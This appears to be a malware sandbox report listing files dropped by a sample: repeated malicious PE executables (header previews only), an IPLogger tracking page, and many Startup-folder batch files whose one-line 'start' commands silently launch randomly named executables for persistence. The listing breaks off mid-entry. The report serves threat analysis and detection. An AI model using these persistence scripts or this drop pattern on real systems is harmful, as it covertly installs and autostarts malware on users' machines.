                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\y6XaweA6d3ukZLoFeklnZ9Wr.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\ymBV9PkPmsW6KLoPxnFlPP0z.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\z443T0kZxO5VAxRMw1cjpQdZ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\zfeRg1KL3b6mzyGkHfaolHvL.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0tqRsZaQXhm54caqwDUXuMHC.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.026941986008737
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5MBPgnJNHFn:fE1sZ23MBWNHF
                                                                                                                                                                                                                                MD5:80CC3D014B4979C198D077188214DE7C
                                                                                                                                                                                                                                SHA1:5EB0F792C2BB313884AA06962E09F6BA94B8E395
                                                                                                                                                                                                                                SHA-256:5716AF663F6362A9E59E597FB703F2E8B4C735DB41EC2E79E9536C3592D18DA7
                                                                                                                                                                                                                                SHA-512:622BC4353436299A80144AF234F599F711E073D2AF280F9B7BD18BB06DA21620591F4DBC6D8EF99491D51C8DE8F54B8A162F96E6D2183417374833F0B465BF95
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\idw0Y68mq2UfXecINGuMfSFO.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13YCUaamLsi0QOacTlyUtCF3.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558925
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5pQKwT8QEUK9L9JHF:fE1sZ23obK9nl
                                                                                                                                                                                                                                MD5:9EB4BDC77A2D31B8423F7C8B2705FA7F
                                                                                                                                                                                                                                SHA1:EFBBD39F70EFA82D235E655D6A04F88945926D06
                                                                                                                                                                                                                                SHA-256:057D1BD21516CF257B47B1417CC9F3C656E8939A06D6B00A1046FAC671BB1B95
                                                                                                                                                                                                                                SHA-512:55D752B32212F1662A6181AF9C10FF68B72896EDAAB165823EDA0772FF0B1CC35DC9A9964588CBBC072FCE21A185ED960BA67607C81108D8A3F622CD41D7704F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\LuXFYkxCqJv6U5aGsy6shXnX.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1hkcRBWLeEPqv2ntphnoy15W.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.831148145366319
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52NMZ89otVF:fE1sZ232689otVF
                                                                                                                                                                                                                                MD5:3340C44FC628CBFB3A3812AB83E0341D
                                                                                                                                                                                                                                SHA1:98FEDB4AF543797EF2C9394A53165D27C66314AF
                                                                                                                                                                                                                                SHA-256:549A4680478C99B3513120E8A7236756535A8B927E813281F62739599036053F
                                                                                                                                                                                                                                SHA-512:9DBF4C70227E55BCDA96DD63EA7D7AF65897CD149144C830FA25F7DC7E5C92C8AAF2EB5636664A0146926BBED51BD2AEFC2C8E311AC29C97573135833A6B3541
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3rRyjClAJ2k30QIrWGpVFDpo.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.965135283016123
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5v1ENANU02lL4m:fE1sZ23NIANU02lL
                                                                                                                                                                                                                                MD5:5C18544425456CAC29600E4AF4FEDAC4
                                                                                                                                                                                                                                SHA1:37862979F9C3D19B5F110D168FFA5F315CCB05B1
                                                                                                                                                                                                                                SHA-256:AEF088CB3471333637030984B6C9CEB7CBA5D90A96C1BAEFD4972DB397197F86
                                                                                                                                                                                                                                SHA-512:CD59F53FA3EAE0B9BAEA4EBEAF66DF8687384ECA873A8D75E3B948598F3700D0D8672A9916C64588DB83293942CB9F72466641203CC9102A038E9CA03177A085
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JMNwDYLRHcfb7Lck3bh1QS4f.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5vz9LfAQRgiDqx5aIN1rUzgI.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.976075681598202
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5qvogcSStKQ:fE1sZ23qFQ
                                                                                                                                                                                                                                MD5:29E51100D82A5F2F7CF3A51D1302268B
                                                                                                                                                                                                                                SHA1:EF0405F1175CF04A4927FB194D91E75E6A41F860
                                                                                                                                                                                                                                SHA-256:00E5EFA1B221DF11A02CFBFE768FD9B107DE1B4E1C1BE00CEDC752CE93FAE54E
                                                                                                                                                                                                                                SHA-512:816DB6A399E4A532F43231C7ADB4F63EC7CE5C30DBEFFAAA351BC1FCD12630758A9305E5CBCDE2A23C05DACAD29B4C3B038D53674540CE54BE9C62D441DB7AD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6Lj2r8HjpXGeANxR3KECgncY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.005061188844578
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5dW2NyRwlp4Ln:fE1sZ23R1lp8
                                                                                                                                                                                                                                MD5:C8354EF8FC24B3340BFF3A166B76D40F
                                                                                                                                                                                                                                SHA1:8461BB364E3DBD652A2CAE8EACA45A35A5784FDB
                                                                                                                                                                                                                                SHA-256:41901B2EDC46ABAFF6022FBB8D4D51067BB5512E9535E3B105C3798B7018749B
                                                                                                                                                                                                                                SHA-512:2DAF6AB49B7ED777ECDEDF57E55B1AD8C49D0D72545D40018EE664D0560D3C991AAF6A9C3914329D240A801381FE1B80A5BCBF0ACE26ED8D7EF22C87444C0245
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\x3HF5f4W7zVGUR0m1DVxQqdq.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fMi9oyVvviqTTN6Wr56ISLB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.688608971980529
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5REOXKmLJJgTqJln:fE1sZ2376mLATqJl
                                                                                                                                                                                                                                MD5:807EB670A7AE325E9561917101FC07F1
                                                                                                                                                                                                                                SHA1:1D4B61B353D373EAFFFB78E1D4754850F052814A
                                                                                                                                                                                                                                SHA-256:DEFA34C3F4B6056DBAA39D2A5565D28EAD68076442EB658F905B76A4431A0CFF
                                                                                                                                                                                                                                SHA-512:7585F93CB00D11E9CCDB92CB0A965D8B97BB7AFDE70DE25268A1C1D725419F4FF4D7E80188EDF1F1D44A6637E883381245B1E4632758827C4638016C505C8D50
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6xZdoDoBUE5p5eHQogOzmCAe.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.005061188844578
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5c5MjAJ8C6VF:fE1sZ23cSjdF
                                                                                                                                                                                                                                MD5:569A6D9EA000B21354CEB1BB7941A5A5
                                                                                                                                                                                                                                SHA1:3A79E9C4E9AF3C3B7E1187D6232783E6F1B44831
                                                                                                                                                                                                                                SHA-256:A5E9958EA3F0AAF70CC0B29708DF92EDEFDAC61779EC71C2EC4E6E61F5AC2B3E
                                                                                                                                                                                                                                SHA-512:43530FAE0D09230C5F1F981EAF3E9784182F28D1AD5F531B7BD338F2399BA96360FCD3D533293FE9E881588669A9D991D9DEF1B2BE9E9CED42F8C845D16253AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\y1mf9KikiO68brzuQYIFxwgi.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BtjTi3FF9au1FQnlKymnDMg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.83680552979477
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5vxw7/A1zxiF:fE1sZ23JwjQzQF
                                                                                                                                                                                                                                MD5:23AC28EDE319FC47FEAC4B44689CF92C
                                                                                                                                                                                                                                SHA1:A25CB7627583F7EE12724E1833D025445AF15ADC
                                                                                                                                                                                                                                SHA-256:740D89CC70166C82C38038BEAE38AE4DA6F702E1C05D160FEA97A78295AD3387
                                                                                                                                                                                                                                SHA-512:3575313B2161D138BAC4BB03F74E5CF731EDF0A465066CA1596F3875EB71FE0ED164CA78CA2FC5F48D27F48524C065FE9A026CA8F301168BE3D34B1F89658298
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JUzoV9GxBJCDHhTcPnbRBLla.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7IdlNY4tr5xX5jsAv5Xm1aGP.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.955976812787872
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5qNpNVCv:fE1sZ23q5Ev
                                                                                                                                                                                                                                MD5:7BD9ED707A74644111C6A28F1A692906
                                                                                                                                                                                                                                SHA1:875364DCBF7A2A31D1D2DFBC50A4A308112CE723
                                                                                                                                                                                                                                SHA-256:04B5781771AD9A6528E7D4E54EFF5773218A2BCF77AC42EE121F21ACD99700A7
                                                                                                                                                                                                                                SHA-512:49D832CBB68F33EAF6D91384941C9AB074B3CF41C7E16E85FE10B96E86B97F090138A8B44A5551128DC42EE47965D8066C3EAD7B6B0CD4DE972754832CC8128C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\OVzuyLkGPqt0m8hgNA0UwSGi.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lgGvzEo7nECzBG3bpAxjivM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5/fuzJsJPA8HFn:fE1sZ2338JsJP9
                                                                                                                                                                                                                                MD5:3EB1017E5F140F24233BD3D59E6DDDA5
                                                                                                                                                                                                                                SHA1:FE24EFA41F73E4A6E738E5D3DB83CAFCC064572F
                                                                                                                                                                                                                                SHA-256:A09C33E413AAFE2DE86CFB4C0ED45252368641257D918465CACF319B38CA6F11
                                                                                                                                                                                                                                SHA-512:DE217E707565DF077C5C3D26B05ACFEE2AD517A3E9F89589DFCB7ECE2718E5DCBCB5B84E859D87F7195D0CF4B4B629A3EDE5DA8A8E4E63322033EA009ABB3363
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ZHH3BNVA85IlSTeCpiV3Sgqb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84qHSnAnloUyGTjudCcnx8X7.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.860133652612695
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5rRD9YE+LHv:fE1sZ23NhYxLHv
                                                                                                                                                                                                                                MD5:0A136C49FF8363EA6D8BB9AC524D5E74
                                                                                                                                                                                                                                SHA1:5E7FCDAC139922A48B51FAA90812F40DFF0866A8
                                                                                                                                                                                                                                SHA-256:C6C2D9CA965348865A0C7F760862B0EDCD099619B963E8BB555AF54563C74F5E
                                                                                                                                                                                                                                SHA-512:6F7852E84B1E43ACC759C8227C3E8AD18633489D5DE4005CCDAEB0542942C66C0A16798BFD15D798C4570082130DFD505588173F34FC828E26794862F6C0E19D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8U1eBzGHaaLerzhFHg9U9VIJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.01690789206074
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5siAwCky4/kdan:fE1sZ23sDp4/D
                                                                                                                                                                                                                                MD5:78263AC5C4FE433FA33D72CE63AB6BED
                                                                                                                                                                                                                                SHA1:1B4AD3460224373C3AEC61517E534951956CE667
                                                                                                                                                                                                                                SHA-256:CA89DFBFE1003CFFA5FE89424E8BEA29026B47DAE3151AA96ACB91A5929E2087
                                                                                                                                                                                                                                SHA-512:EC3227BDFACFE5006FCB3C679D29421850929A39899B9250F1E65EBAF7A652FC042D3E41F256C38CC99DA49C260107410FE3BD870CA8EF9060079BAAC179990C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8xb4CYcBawbLerlRgmQScw49.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.932648689969946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RQn1QwURHHF:fE1sZ23S1QRnF
                                                                                                                                                                                                                                MD5:ED7D69AF69E55F4238F716046B39CD81
                                                                                                                                                                                                                                SHA1:0FF7DFD72F1B74BF93450718A005506F7529BE83
                                                                                                                                                                                                                                SHA-256:794F557A82D3FB26B510AE3B09C0F3D4EB7C4C92A44DE3EE58F157F7DAC18516
                                                                                                                                                                                                                                SHA-512:817E3B20287A3042F78BCFD750FC42CA0056B8B8DB3CE1EC6FB88603FCAAF1EB43E129CACD34FD0B275F070E2F4FED23CF1E05A1AF054C83FCD982BC143CCDB8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\913UuC1tRhVGy6AHxLqTaVLY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.720863500809264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5DUcGttp9Qn:fE1sZ23h3
                                                                                                                                                                                                                                MD5:7DD14739F1A013AAE29B899AD3B17BCB
                                                                                                                                                                                                                                SHA1:5554E40D057BE3E1A4073505A4279E35EEB1359B
                                                                                                                                                                                                                                SHA-256:665AE94FC31D915EDA06EDA06B81A639478A7CFC25E2704E024710FF279F612A
                                                                                                                                                                                                                                SHA-512:DAC6888D84BE8FAA51BFD0DC3E28DACBDC86403FA9D663688A2666BF27359FC4796E8455BABFD33E3DED3D6F02CA1414F41E1C51169BBD5F1EA2D2ADD911C1B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6qSF0ut9ErFpR3WVXzTlEB6.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
